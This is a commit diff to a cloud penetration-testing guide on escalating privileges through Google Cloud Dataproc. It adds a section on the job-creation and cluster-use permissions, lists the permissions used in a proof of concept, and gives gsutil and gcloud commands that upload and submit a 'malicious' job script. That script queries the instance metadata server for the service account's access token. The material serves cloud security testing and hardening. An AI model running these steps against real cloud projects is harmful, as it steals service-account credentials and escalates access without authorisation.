dataproc privesc update

Author: Mac

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md

@@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating,
 
 These permissions make both roles highly sensitive and dangerous if misused.
 
+## dataproc.jobs.create & dataproc.clusters.use
+
+The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
+
+the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)   
+
 
 ## Privilege Escalation via Metadata Token Leaking
 
-By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: 
+
 
 - Submit a job to a Dataproc cluster.
 
@@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc
 
 import requests
 
-# Metadata server URL to fetch the access token
+## Metadata server URL to fetch the access token
 
 ```
 metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
@@ -53,6 +59,9 @@ if __name__ == "__main__":
 ### Steps to exploit
 
 ```
+# Copy the script to the storage bucket
+gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
+# Submit the malicious job
 gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
     --cluster=<cluster-name> \
     --region=<region>